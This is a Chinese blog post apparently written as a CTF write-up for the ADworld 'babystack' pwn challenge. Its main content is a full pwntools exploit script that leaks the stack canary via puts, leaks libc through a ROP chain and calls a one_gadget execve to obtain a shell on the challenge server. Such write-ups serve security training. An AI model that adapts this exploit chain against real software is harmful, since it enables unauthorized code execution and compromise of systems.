ADworld pwn wp - pwn1

最新推荐文章于 2023-07-13 20:08:07 发布
最新推荐文章于 2023-07-13 20:08:07 发布
阅读量177 收藏
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33976344/article/details/118194520
版权

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

不过问题在于开了canary所以溢出有难度, 不过v6是canary保存的变量, 而且栈位置在s数组的高位, 所以可以通过puts()泄露出canary, puts函数是打印直到’\0’字符为止, 所以溢出可行, 劫持执行流到ROP泄露puts函数地址, 计算出libc基址, 然后调用execve()
这里用one_gadget, 坑点在于记得计算服务器上的execve地址

在这里插入图片描述

from pwn import *
from pwnlib import context
from pwnlib.util.cyclic import cyclic

context.log_level = "debug"
URL, PORT = "111.200.241.244", 53919
sel = 0
io = process("./babystack") if sel == 0 else remote(URL, PORT)
pad = 0x88
pop_rdi_addr = 0x0000000000400a93
ret_addr = 0x000000000040067e
elf = ELF("./babystack")
libc = ELF("./libc-2.23.so")
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
puts_symbols = libc.symbols['puts']
main_addr = 0x0000000000400908
execve = 0x45216

payload1 = b'z' * (pad - 1) + b'y'
io.sendlineafter(">> ", "1")
io.sendline(payload1)
io.sendlineafter(">> ", "2")
log.info(io.recvuntil(b'zy\n'))
canary = u64(io.recv(7).rjust(8, b'\x00'))
log.info("canary leak success: %#x", canary)
io.sendlineafter(">> ", "1")

payload2 = cyclic(pad) + p64(canary) + cyclic(8) + p64(pop_rdi_addr) + p64(puts_got)
payload2 += p64(puts_plt) + p64(main_addr)
io.send(payload2)
io.sendlineafter(">> ", "3")
puts_addr = u64(io.recv(8).strip().ljust(8, b'\x00'))
log.info("puts address leak success: %#x", puts_addr)

libc_base = puts_addr - puts_symbols
execve_addr = libc_base + execve
payload3 = cyclic(pad) + p64(canary) + cyclic(8)
payload3 += p64(execve_addr)

log.info(io.recv())
io.sendlineafter(">> ", "1")
io.send(payload3)
io.sendlineafter(">> ", "3")
io.interactive()

在这里插入图片描述

总结

如果本地开了其他检测机制, 可能打不通
在这里插入图片描述

fa1c4
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xctf新手练习https://adworld.xctf.org.cn/task/task_list?type=misc&number=1&grade=0
weixin_30438813的博客
05-23 2612
view source Q:无法用鼠标右键查看原码,怎么办?A:浏览器地址栏在网址前输入 view-source: 即可查看源码 get post Q:用 get 提交 a=1,用 post 提交 b=2A:url后加 ?a=1,用 hackbar 提交b=2 robots Q:robots.txtA:域名后加 robots.txt backup Q:找到网站的备份文件A:暴力域名。...
「干货」XCTF Web安全入门练习靶场全部通关教程
橙留香Park的博客
04-13 6822
转移发布平台通知:将不再在CSDN博客发布新文章,敬请移步知识星球... ...
CTF竞赛介绍及刷题网址更新---2020.08
热门推荐
第七宇林的博客
08-15 1万+
CTF(夺旗赛) ---网络安全技术比赛的介绍 及 CTF常用的在线刷题网站:RedTigers-Hackit、XCTF(攻防世界)竞赛平台、网络信息安全攻防学习平台、OWASP 中国、实验吧CTF训练营、全国大学生信息安全竞赛官方网站、MS09067WEB靶场、合天网安实验室、封神台、SQL Fiddle、 BUUCTF、CTFHUB...
攻防世界:Web (新手练习题)之 weak_auth
weixin_45871855的博客
02-12 1353
weak auth 想玩玩攻防世界的朋友,CE已附上XCTF Web 练习题链接:https://adworld.xctf.org.cn/ 解题思路: 首先什么都不输入先logon得到 并弹窗提示:please login as admin!(请以管理员身份登录) 我们再打开check.php 的页面源代码看看会不会有什么线索 发现在有注释的信息,提示:maybe you need a di...
Pwnwp
weixin_52553215的博客
11-22 708
如%100×10$n 表示将 0x64 写入偏移 10 处保存的指针所指向的地址(4字节),而$hn 表示写入的地址空间为 2 字节,$hhn 表示写入的地址空间为 1字节,%$lln 表示写入的地址空间为 8 字节,在 32bit 和 64bit 环境下一样。猜测 0x40060d 这个地址是个函数,运行这个函数可以直接拿到 flag,那我们只需要去不断的填充垃圾数据,然后在后面加个给的地址(也可能是不加,分情况讨论),不断尝试,直到把这个地址填充到返回地址的位置。
adworld-wargame:我对https://adworld.xctf.org.cntask上的pwn挑战的利用
02-13
在本文中,我们将深入探讨一个名为"adworld-wargame"的在线Pwn挑战,该挑战源自https://adworld.xctf.org.cn/task平台。这个挑战主要涉及Python编程语言,这意味着我们需要熟悉Python的内存管理和安全特性来成功解决...
dice_game.zip
06-16
资源为攻防世界上的pwn题目样本,主要就是设计缓冲区溢出,大家也可在攻防世界pwn练习题中获取,地址为https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4694&page=1
Adworld2012互联网营销世界大会PPT下载
07-23
教程名称: Adworld2012互联网营销世界大会PPT下载【】APPS新媒体运营及营销探索-岳建雄-搜狐【】体育营销动起来-陈鄂-力美【】品牌广告推动移动营销创新-郭伟-安沃传媒【】基于受众的网络广告交易市场-王岳龙-传漾...
【XCTF-Mobile】新手练习区-09-Ph0en1x-100.rar
08-31
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5093&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ph0en1x_100
【XCTF-RE】新手练习区-simple-unpack
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ld1cw8
考核PWNwp(未完待续)
m0_75234353的博客
05-23 178
就是要输入一个负数,然后进行num=-num,再判断是否为负数,是的话成功绕过,再进入vuln函数。vuln函数给了system函数,但参数需要自己压入栈内。我们再去看看num=-num是怎么具体实现的,直接看汇编语言。发现是依靠neg指令来完成的。
2023CISCN—华中赛区—pwn wp
最新发布
m0_63437215的博客
07-13 1186
ciscn2023华中赛区pwn
几道buuctf pwn wp
weixin_44113469的博客
02-07 353
buuctf wp try_your_nc from pwn import * from sys import * debug=1 if debug: p=remote("node3.buuoj.cn",26062) else: p=process("xxx") p.interactive() pwn1_sctf_2016 C++ 写的,害,输入I, 会转换为you,所以有溢出啊,还有后面函数 from pwn import * from sys import * debug=1 c
[CTF-PWN]攻防世界新手村-hello_pwn[wp]
murongxuege的博客
10-01 2551
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 从描述中可以看出当前程序是要进行年龄的输入操作的,有输入操作,还是在新手村,那么大概率是gets()等C函数输入漏洞,进一步猜测是普通的内存地址覆盖的题。 che
HTTP出现前的协议
CCCCCC1990的博客
04-07 365
前言 再HTTP普及之前,也就是从互联网的诞生期至今,曾出现过各式各样的协议。在HTTP规范确立之际,制定者们参考了那些协议的功能。 正文 1、FTP(File Transfer Protocol) 【https://www.cnblogs.com/luoxn28/p/5585458.html】 【https://www.jianshu.com/p/e811421a76e2】 ...
攻防世界hello pwn WPpwn入门基础题)
m0_62584974的博客
11-21 2037
攻防世界hello pwn WPpwn入门基础题)的简单讲解
2023上海“磐石行动”pwn wp
m0_63437215的博客
05-23 491
2023上海市大学生网络安全大赛 pwn
pwn 做题记录 2.8 adworld hello_pwn
qq_62423835的博客
02-08 2631
菜鸡的第二篇日记
pwn】2022 祥云杯 部分wp
woodwhale的博客
10-31 1204
2022 祥云杯 pwn 部分wp,有空复现别的题目
bugku 里面的五个pwnwp
qq_36495104的博客
05-08 2132
pwn1 没给二进制文件,直接nc过去就能拿shell,查看flag,flag{6979d853add353c9} pwn2 查看保护,发现什么保护都没开启 ida反编译查看 明显栈溢出,还注意到有后门函数 只需要劫持函数的返回地址到get_shell函数,就可以用拿到flag。使用gdb调试发现,在0x38个字符后就会覆盖返回地址,所以编写脚本拿flag。 exp #pwn2.py from pwn import * #sh=process('./pwn2') sh=remote('11

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值